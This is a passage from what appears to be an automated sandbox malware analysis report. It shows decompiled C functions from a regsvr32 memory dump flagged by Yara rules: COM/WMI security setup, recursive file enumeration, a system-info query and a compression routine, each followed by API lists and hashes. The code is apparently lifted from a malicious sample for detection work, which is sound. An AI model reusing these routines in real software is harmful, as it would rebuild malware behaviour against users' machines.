                                                                                                                                                                                              				void* _v12;
                                                                                                                                                                                              				char* _t15;
                                                                                                                                                                                              				intOrPtr* _t16;
                                                                                                                                                                                              				void* _t21;
                                                                                                                                                                                              				intOrPtr* _t23;
                                                                                                                                                                                              				intOrPtr* _t24;
                                                                                                                                                                                              				intOrPtr* _t25;
                                                                                                                                                                                              				void* _t30;
                                                                                                                                                                                              				void* _t33;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v12 = 0;
                                                                                                                                                                                              				_v8 = 0;
                                                                                                                                                                                              				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
                                                                                                                                                                                              				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
                                                                                                                                                                                              				_t15 =  &_v12;
                                                                                                                                                                                              				__imp__CoCreateInstance(0x49ac868, 0, 1, 0x49ac878, _t15);
                                                                                                                                                                                              				if(_t15 < 0) {
                                                                                                                                                                                              					L5:
                                                                                                                                                                                              					_t23 = _v8;
                                                                                                                                                                                              					if(_t23 != 0) {
                                                                                                                                                                                              						 *((intOrPtr*)( *_t23 + 8))(_t23);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t24 = _v12;
                                                                                                                                                                                              					if(_t24 != 0) {
                                                                                                                                                                                              						 *((intOrPtr*)( *_t24 + 8))(_t24);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t16 = 0;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					__imp__#2(__ecx);
                                                                                                                                                                                              					_t25 = _v12;
                                                                                                                                                                                              					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
                                                                                                                                                                                              					if(_t21 < 0) {
                                                                                                                                                                                              						goto L5;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
                                                                                                                                                                                              						if(_t21 < 0) {
                                                                                                                                                                                              							goto L5;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							_t16 = E04998BDE(8);
                                                                                                                                                                                              							if(_t16 == 0) {
                                                                                                                                                                                              								goto L5;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								 *((intOrPtr*)(_t16 + 4)) = _v12;
                                                                                                                                                                                              								 *_t16 = _v8;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t16;
                                                                                                                                                                                              			}














                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,0499E731,000009DA,00000000,?,00000000), ref: 0499E413
                                                                                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0499E731,000009DA,00000000,?,00000000), ref: 0499E424
                                                                                                                                                                                              • CoCreateInstance.OLE32(049AC868,00000000,00000001,049AC878,?,?,0499E731,000009DA,00000000,?,00000000), ref: 0499E43B
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0499E446
                                                                                                                                                                                              • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,0499E731,000009DA,00000000,?,00000000), ref: 0499E471
                                                                                                                                                                                                • Part of subcall function 04998BDE: RtlAllocateHeap.NTDLL(00000008,?,?,0499959D,00000100,?,04996507), ref: 04998BEC
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1610782348-0
                                                                                                                                                                                              • Opcode ID: e3b128f616da0566a431f75d355bcc992de7f528397aed0049bba2cea8dd78a2
                                                                                                                                                                                              • Instruction ID: 9ec6c9cadd000473b60b26cb585f71881e5be6f5e5475cdaa4f2dc9f77b8688f
                                                                                                                                                                                              • Opcode Fuzzy Hash: e3b128f616da0566a431f75d355bcc992de7f528397aed0049bba2cea8dd78a2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C21E970A00245BFEB249B6BDC4DE5BBFBCEFC6F15F10456CB505AA290D674AA00CA61
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 78%
                                                                                                                                                                                              			E0499BCFC(void* __ecx, void* __fp0, intOrPtr _a16) {
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				WCHAR* _v16;
                                                                                                                                                                                              				struct _WIN32_FIND_DATAW _v608;
                                                                                                                                                                                              				WCHAR* _t24;
                                                                                                                                                                                              				intOrPtr _t31;
                                                                                                                                                                                              				intOrPtr _t41;
                                                                                                                                                                                              				void* _t45;
                                                                                                                                                                                              				intOrPtr _t46;
                                                                                                                                                                                              				void* _t48;
                                                                                                                                                                                              				intOrPtr _t54;
                                                                                                                                                                                              				void* _t59;
                                                                                                                                                                                              				char _t60;
                                                                                                                                                                                              				void* _t61;
                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                              				void* _t63;
                                                                                                                                                                                              				void* _t75;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t75 = __fp0;
                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                              				_t48 = __ecx;
                                                                                                                                                                                              				_push(L"\\*");
                                                                                                                                                                                              				_t24 = E04999A5A(__ecx);
                                                                                                                                                                                              				_t63 = _t62 + 0xc;
                                                                                                                                                                                              				_v16 = _t24;
                                                                                                                                                                                              				if(_t24 == 0) {
                                                                                                                                                                                              					return _t24;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t59 = FindFirstFileW(_t24,  &_v608);
                                                                                                                                                                                              				if(_t59 == 0xffffffff) {
                                                                                                                                                                                              					L14:
                                                                                                                                                                                              					return E04998BF4( &_v16, 0xfffffffe);
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					goto L2;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					L2:
                                                                                                                                                                                              					if(E0499BCD4( &(_v608.cFileName)) != 0) {
                                                                                                                                                                                              						goto L12;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					if((_v608.dwFileAttributes & 0x00000010) != 0) {
                                                                                                                                                                                              						L10:
                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                              						_push( &(_v608.cFileName));
                                                                                                                                                                                              						_push(0x49ac9a0);
                                                                                                                                                                                              						_t60 = E04999A5A(_t48);
                                                                                                                                                                                              						_t63 = _t63 + 0x10;
                                                                                                                                                                                              						_v12 = _t60;
                                                                                                                                                                                              						if(_t60 != 0) {
                                                                                                                                                                                              							_t54 =  *0x49af818; // 0x4bdf8b0
                                                                                                                                                                                              							 *((intOrPtr*)(_t54 + 0xc0))(1);
                                                                                                                                                                                              							_push(1);
                                                                                                                                                                                              							_push(1);
                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                              							E0499BCFC(_t60, _t75, 1, 5, E049A0015, _a16);
                                                                                                                                                                                              							_t63 = _t63 + 0x1c;
                                                                                                                                                                                              							E04998BF4( &_v12, 0xfffffffe);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						goto L12;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t61 = 0;
                                                                                                                                                                                              					do {
                                                                                                                                                                                              						_t7 = _t61 + 0x49af924; // 0x0
                                                                                                                                                                                              						_push( *_t7);
                                                                                                                                                                                              						_push( &(_v608.cFileName));
                                                                                                                                                                                              						_t41 =  *0x49af824; // 0x4bdfb78
                                                                                                                                                                                              						if( *((intOrPtr*)(_t41 + 0x18))() == 0) {
                                                                                                                                                                                              							goto L8;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t45 = E049A0015(_t75, _t48,  &_v608, _a16);
                                                                                                                                                                                              						_t63 = _t63 + 0xc;
                                                                                                                                                                                              						if(_t45 == 0) {
                                                                                                                                                                                              							break;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t46 =  *0x49af818; // 0x4bdf8b0
                                                                                                                                                                                              						 *((intOrPtr*)(_t46 + 0xc0))(1);
                                                                                                                                                                                              						L8:
                                                                                                                                                                                              						_t61 = _t61 + 4;
                                                                                                                                                                                              					} while (_t61 < 4);
                                                                                                                                                                                              					if((_v608.dwFileAttributes & 0x00000010) == 0) {
                                                                                                                                                                                              						goto L12;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					goto L10;
                                                                                                                                                                                              					L12:
                                                                                                                                                                                              				} while (FindNextFileW(_t59,  &_v608) != 0);
                                                                                                                                                                                              				_t31 =  *0x49af818; // 0x4bdf8b0
                                                                                                                                                                                              				 *((intOrPtr*)(_t31 + 0x80))(_t59);
                                                                                                                                                                                              				goto L14;
                                                                                                                                                                                              			}




















                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,00000000,00000000), ref: 0499BD2D
                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0499BE10
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileFind$FirstNext
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1690352074-0
                                                                                                                                                                                              • Opcode ID: 2b23bef37c80e474509dc36535b478034cf238d2589b49af7f630e5ea8f093df
                                                                                                                                                                                              • Instruction ID: 3feaecef5d0c634618c795506d3a72ce192991c4a75335cd9dac6487ef30ce92
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b23bef37c80e474509dc36535b478034cf238d2589b49af7f630e5ea8f093df
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E31C672A002196FEF209AACAC49FAA37ECFB80714F040174E515AA1C1EA75BD51CBE5
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,049952C8), ref: 0499A072
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Time$FileSystem
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2086374402-0
                                                                                                                                                                                              • Opcode ID: 3d4a05ff6ae29f31bc1f8751253104523d60e111600e63597a5c9bcae7d6a96f
                                                                                                                                                                                              • Instruction ID: 71f0be36a0a026d992cacf99c9c9c68bc46184d362637ae408db7982d72fbddd
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3d4a05ff6ae29f31bc1f8751253104523d60e111600e63597a5c9bcae7d6a96f
                                                                                                                                                                                              • Instruction Fuzzy Hash: A5E01AB69003187FDB10EE689905A9ABAACEBC0A14F114964AC45A7244E670AE0886D0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E0499DD62(void* __ecx) {
                                                                                                                                                                                              				struct _SYSTEM_INFO _v40;
                                                                                                                                                                                              				void* _t5;
                                                                                                                                                                                              
                                                                                                                                                                                              				if(__ecx == 0) {
                                                                                                                                                                                              					GetSystemInfo( &_v40);
                                                                                                                                                                                              					return _v40.dwOemId & 0x0000ffff;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t5 = 9;
                                                                                                                                                                                              					return _t5;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}






                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,0499E13B), ref: 0499DD75
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: InfoSystem
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 31276548-0
                                                                                                                                                                                              • Opcode ID: ebe463642fe0c9c20a21f5462aeae9f484ff59ca7ccbeed5f584edbd589ca605
                                                                                                                                                                                              • Instruction ID: 14f141acaaeb5216a9ca6a71295c69a72711a5f71cf99d132d89a0be167b6edf
                                                                                                                                                                                              • Opcode Fuzzy Hash: ebe463642fe0c9c20a21f5462aeae9f484ff59ca7ccbeed5f584edbd589ca605
                                                                                                                                                                                              • Instruction Fuzzy Hash: 17C022E1A0020906CF0097A561566AA32FC6B04208F2005A0E802F0080E550EC4082A0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 99%
                                                                                                                                                                                              			E049A8240(intOrPtr _a4, signed int _a8, signed int _a12) {
                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                              				signed short* _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				signed short _v20;
                                                                                                                                                                                              				unsigned int _v24;
                                                                                                                                                                                              				signed short _v28;
                                                                                                                                                                                              				signed int _t223;
                                                                                                                                                                                              				signed int _t235;
                                                                                                                                                                                              				signed int _t237;
                                                                                                                                                                                              				signed short _t240;
                                                                                                                                                                                              				signed int _t241;
                                                                                                                                                                                              				signed short _t244;
                                                                                                                                                                                              				signed int _t245;
                                                                                                                                                                                              				signed short _t248;
                                                                                                                                                                                              				signed int _t249;
                                                                                                                                                                                              				signed int _t250;
                                                                                                                                                                                              				void* _t254;
                                                                                                                                                                                              				signed char _t259;
                                                                                                                                                                                              				signed int _t275;
                                                                                                                                                                                              				signed int _t289;
                                                                                                                                                                                              				signed int _t308;
                                                                                                                                                                                              				signed short _t316;
                                                                                                                                                                                              				signed int _t321;
                                                                                                                                                                                              				void* _t329;
                                                                                                                                                                                              				signed short _t330;
                                                                                                                                                                                              				signed short _t333;
                                                                                                                                                                                              				signed short _t334;
                                                                                                                                                                                              				signed short _t343;
                                                                                                                                                                                              				signed short _t346;
                                                                                                                                                                                              				signed short _t347;
                                                                                                                                                                                              				signed short _t348;
                                                                                                                                                                                              				signed short _t358;
                                                                                                                                                                                              				signed short _t361;
                                                                                                                                                                                              				signed short _t362;
                                                                                                                                                                                              				signed short _t363;
                                                                                                                                                                                              				signed short _t370;
                                                                                                                                                                                              				signed int _t373;
                                                                                                                                                                                              				signed int _t378;
                                                                                                                                                                                              				signed short _t379;
                                                                                                                                                                                              				signed short _t382;
                                                                                                                                                                                              				unsigned int _t388;
                                                                                                                                                                                              				unsigned short _t390;
                                                                                                                                                                                              				unsigned short _t392;
                                                                                                                                                                                              				unsigned short _t394;
                                                                                                                                                                                              				signed int _t396;
                                                                                                                                                                                              				signed int _t397;
                                                                                                                                                                                              				signed int _t398;
                                                                                                                                                                                              				signed int _t400;
                                                                                                                                                                                              				signed short _t401;
                                                                                                                                                                                              				signed int _t402;
                                                                                                                                                                                              				signed int _t403;
                                                                                                                                                                                              				signed int _t407;
                                                                                                                                                                                              				signed int _t409;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t223 = _a8;
                                                                                                                                                                                              				_t235 =  *(_t223 + 2) & 0x0000ffff;
                                                                                                                                                                                              				_push(_t397);
                                                                                                                                                                                              				_t388 = 0;
                                                                                                                                                                                              				_t398 = _t397 | 0xffffffff;
                                                                                                                                                                                              				if(_a12 < 0) {
                                                                                                                                                                                              					L42:
                                                                                                                                                                                              					return _t223;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t329 =  !=  ? 7 : 0x8a;
                                                                                                                                                                                              					_v12 = _t223 + 6;
                                                                                                                                                                                              					_t254 = (0 | _t235 != 0x00000000) + 3;
                                                                                                                                                                                              					_v16 = _a12 + 1;
                                                                                                                                                                                              					do {
                                                                                                                                                                                              						_v24 = _t388;
                                                                                                                                                                                              						_t388 = _t388 + 1;
                                                                                                                                                                                              						_a8 = _t235;
                                                                                                                                                                                              						_a12 = _t235;
                                                                                                                                                                                              						_v8 =  *_v12 & 0x0000ffff;
                                                                                                                                                                                              						_t223 = _a4;
                                                                                                                                                                                              						if(_t388 >= _t329) {
                                                                                                                                                                                              							L4:
                                                                                                                                                                                              							if(_t388 >= _t254) {
                                                                                                                                                                                              								if(_a8 == 0) {
                                                                                                                                                                                              									_t122 = _t223 + 0x16bc; // 0xfed1e900
                                                                                                                                                                                              									_t400 =  *_t122;
                                                                                                                                                                                              									if(_t388 > 0xa) {
                                                                                                                                                                                              										_t168 = _t223 + 0xac4; // 0x1cfde808
                                                                                                                                                                                              										_t330 =  *_t168 & 0x0000ffff;
                                                                                                                                                                                              										_t169 = _t223 + 0xac6; // 0x1cfd
                                                                                                                                                                                              										_t237 =  *_t169 & 0x0000ffff;
                                                                                                                                                                                              										_v24 = _t330;
                                                                                                                                                                                              										_t171 = _t223 + 0x16b8; // 0x105bb
                                                                                                                                                                                              										_t333 = (_t330 << _t400 |  *_t171) & 0x0000ffff;
                                                                                                                                                                                              										_v28 = _t333;
                                                                                                                                                                                              										if(_t400 <= 0x10 - _t237) {
                                                                                                                                                                                              											_t259 = _t400 + _t237;
                                                                                                                                                                                              										} else {
                                                                                                                                                                                              											_t173 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                              											 *(_t223 + 0x16b8) = _t333;
                                                                                                                                                                                              											_t175 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                              											 *((char*)( *_t175 +  *_t173)) = _v28;
                                                                                                                                                                                              											_t223 = _a4;
                                                                                                                                                                                              											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                              											_t181 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                              											_t182 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                              											_t183 = _t223 + 0x16b9; // 0x105
                                                                                                                                                                                              											 *((char*)( *_t181 +  *_t182)) =  *_t183;
                                                                                                                                                                                              											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                              											_t333 = _v24 >> 0x10;
                                                                                                                                                                                              											_t189 = _t223 + 0x16bc; // 0xfed1e900
                                                                                                                                                                                              											_t259 =  *_t189 + 0xfffffff0 + _t237;
                                                                                                                                                                                              										}
                                                                                                                                                                                              										_t334 = _t333 & 0x0000ffff;
                                                                                                                                                                                              										 *(_t223 + 0x16bc) = _t259;
                                                                                                                                                                                              										 *(_t223 + 0x16b8) = _t334;
                                                                                                                                                                                              										_t401 = _t334 & 0x0000ffff;
                                                                                                                                                                                              										if(_t259 <= 9) {
                                                                                                                                                                                              											_t209 = _t388 - 0xb; // -10
                                                                                                                                                                                              											 *(_t223 + 0x16b8) = _t209 << _t259 | _t401;
                                                                                                                                                                                              											 *(_t223 + 0x16bc) = _t259 + 7;
                                                                                                                                                                                              										} else {
                                                                                                                                                                                              											_t193 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                              											_t390 = _t388 + 0xfffffff5;
                                                                                                                                                                                              											_t194 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                              											_t240 = _t390 << _t259 | _t401;
                                                                                                                                                                                              											 *(_t223 + 0x16b8) = _t240;
                                                                                                                                                                                              											 *( *_t193 +  *_t194) = _t240;
                                                                                                                                                                                              											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                              											_t199 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                              											_t200 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                              											_t201 = _t223 + 0x16b9; // 0x105
                                                                                                                                                                                              											 *((char*)( *_t199 +  *_t200)) =  *_t201;
                                                                                                                                                                                              											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                              											 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff7;
                                                                                                                                                                                              											 *(_t223 + 0x16b8) = _t390 >> 0x10;
                                                                                                                                                                                              										}
                                                                                                                                                                                              										goto L35;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t123 = _t223 + 0xac0; // 0x75ff0c75
                                                                                                                                                                                              									_t343 =  *_t123 & 0x0000ffff;
                                                                                                                                                                                              									_t124 = _t223 + 0xac2; // 0xe80875ff
                                                                                                                                                                                              									_t241 =  *_t124 & 0x0000ffff;
                                                                                                                                                                                              									_v24 = _t343;
                                                                                                                                                                                              									_t126 = _t223 + 0x16b8; // 0x105bb
                                                                                                                                                                                              									_t346 = (_t343 << _t400 |  *_t126) & 0x0000ffff;
                                                                                                                                                                                              									_v28 = _t346;
                                                                                                                                                                                              									if(_t400 > 0x10 - _t241) {
                                                                                                                                                                                              										_t128 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                              										 *(_t223 + 0x16b8) = _t346;
                                                                                                                                                                                              										_t130 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                              										 *((char*)( *_t130 +  *_t128)) = _v28;
                                                                                                                                                                                              										_t223 = _a4;
                                                                                                                                                                                              										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                              										_t136 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                              										_t137 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                              										_t138 = _t223 + 0x16b9; // 0x105
                                                                                                                                                                                              										 *((char*)( *_t136 +  *_t137)) =  *_t138;
                                                                                                                                                                                              										_t142 = _t223 + 0x16bc; // 0xfed1e900
                                                                                                                                                                                              										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                              										_t346 = _v24 >> 0x10;
                                                                                                                                                                                              										_t400 =  *_t142 + 0xfffffff0;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t403 = _t400 + _t241;
                                                                                                                                                                                              									_t347 = _t346 & 0x0000ffff;
                                                                                                                                                                                              									 *(_t223 + 0x16bc) = _t403;
                                                                                                                                                                                              									 *(_t223 + 0x16b8) = _t347;
                                                                                                                                                                                              									_t348 = _t347 & 0x0000ffff;
                                                                                                                                                                                              									if(_t403 <= 0xd) {
                                                                                                                                                                                              										_t163 = _t403 + 3; // 0xfed1e903
                                                                                                                                                                                              										_t275 = _t163;
                                                                                                                                                                                              										L28:
                                                                                                                                                                                              										 *(_t223 + 0x16bc) = _t275;
                                                                                                                                                                                              										_t165 = _t388 - 3; // -2
                                                                                                                                                                                              										_t166 = _t223 + 0x16b8; // 0x105bb
                                                                                                                                                                                              										 *(_t223 + 0x16b8) = (_t165 << _t403 |  *_t166 & 0x0000ffff) & 0x0000ffff;
                                                                                                                                                                                              									} else {
                                                                                                                                                                                              										_t392 = _t388 + 0xfffffffd;
                                                                                                                                                                                              										_t147 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                              										_t244 = _t392 << _t403 | _t348;
                                                                                                                                                                                              										_t148 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                              										 *(_t223 + 0x16b8) = _t244;
                                                                                                                                                                                              										 *( *_t148 +  *_t147) = _t244;
                                                                                                                                                                                              										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                              										_t153 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                              										_t154 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                              										_t155 = _t223 + 0x16b9; // 0x105
                                                                                                                                                                                              										 *((char*)( *_t153 +  *_t154)) =  *_t155;
                                                                                                                                                                                              										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                              										 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff3;
                                                                                                                                                                                              										 *(_t223 + 0x16b8) = _t392 >> 0x00000010 & 0x0000ffff;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									goto L35;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t289 = _a12;
                                                                                                                                                                                              								if(_t289 != _t398) {
                                                                                                                                                                                              									_t53 = _t289 * 4; // 0x59000000
                                                                                                                                                                                              									_t396 =  *(_t223 + _t53 + 0xa7e) & 0x0000ffff;
                                                                                                                                                                                              									_t56 = _t235 * 4; // 0x35e8
                                                                                                                                                                                              									_t370 =  *(_t223 + _t56 + 0xa7c) & 0x0000ffff;
                                                                                                                                                                                              									_t58 = _t223 + 0x16bc; // 0xfed1e900
                                                                                                                                                                                              									_t407 =  *_t58;
                                                                                                                                                                                              									_v28 = _t370;
                                                                                                                                                                                              									_t60 = _t223 + 0x16b8; // 0x105bb
                                                                                                                                                                                              									_t249 = (_t370 << _t407 |  *_t60) & 0x0000ffff;
                                                                                                                                                                                              									if(_t407 <= 0x10 - _t396) {
                                                                                                                                                                                              										_t373 = _t249;
                                                                                                                                                                                              										_t308 = _t407 + _t396;
                                                                                                                                                                                              									} else {
                                                                                                                                                                                              										_t61 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                              										_t62 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                              										 *(_t223 + 0x16b8) = _t249;
                                                                                                                                                                                              										 *( *_t62 +  *_t61) = _t249;
                                                                                                                                                                                              										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                              										_t67 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                              										_t68 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                              										_t69 = _t223 + 0x16b9; // 0x105
                                                                                                                                                                                              										 *((char*)( *_t67 +  *_t68)) =  *_t69;
                                                                                                                                                                                              										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                              										_t75 = _t223 + 0x16bc; // 0xfed1e900
                                                                                                                                                                                              										_t373 = _v28 >> 0x00000010 & 0x0000ffff;
                                                                                                                                                                                              										_t308 =  *_t75 + 0xfffffff0 + _t396;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t388 = _v24;
                                                                                                                                                                                              									 *(_t223 + 0x16bc) = _t308;
                                                                                                                                                                                              									 *(_t223 + 0x16b8) = _t373;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t80 = _t223 + 0xabc; // 0xff177400
                                                                                                                                                                                              								_t358 =  *_t80 & 0x0000ffff;
                                                                                                                                                                                              								_t81 = _t223 + 0x16bc; // 0xfed1e900
                                                                                                                                                                                              								_t402 =  *_t81;
                                                                                                                                                                                              								_t82 = _t223 + 0xabe; // 0xc75ff17
                                                                                                                                                                                              								_t245 =  *_t82 & 0x0000ffff;
                                                                                                                                                                                              								_v24 = _t358;
                                                                                                                                                                                              								_t84 = _t223 + 0x16b8; // 0x105bb
                                                                                                                                                                                              								_t361 = (_t358 << _t402 |  *_t84) & 0x0000ffff;
                                                                                                                                                                                              								_v28 = _t361;
                                                                                                                                                                                              								if(_t402 > 0x10 - _t245) {
                                                                                                                                                                                              									_t86 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                              									 *(_t223 + 0x16b8) = _t361;
                                                                                                                                                                                              									_t88 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                              									 *((char*)( *_t88 +  *_t86)) = _v28;
                                                                                                                                                                                              									_t223 = _a4;
                                                                                                                                                                                              									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                              									_t94 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                              									_t95 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                              									_t96 = _t223 + 0x16b9; // 0x105
                                                                                                                                                                                              									 *((char*)( *_t94 +  *_t95)) =  *_t96;
                                                                                                                                                                                              									_t100 = _t223 + 0x16bc; // 0xfed1e900
                                                                                                                                                                                              									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                              									_t361 = _v24 >> 0x10;
                                                                                                                                                                                              									_t402 =  *_t100 + 0xfffffff0;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t403 = _t402 + _t245;
                                                                                                                                                                                              								_t362 = _t361 & 0x0000ffff;
                                                                                                                                                                                              								 *(_t223 + 0x16bc) = _t403;
                                                                                                                                                                                              								 *(_t223 + 0x16b8) = _t362;
                                                                                                                                                                                              								_t363 = _t362 & 0x0000ffff;
                                                                                                                                                                                              								if(_t403 <= 0xe) {
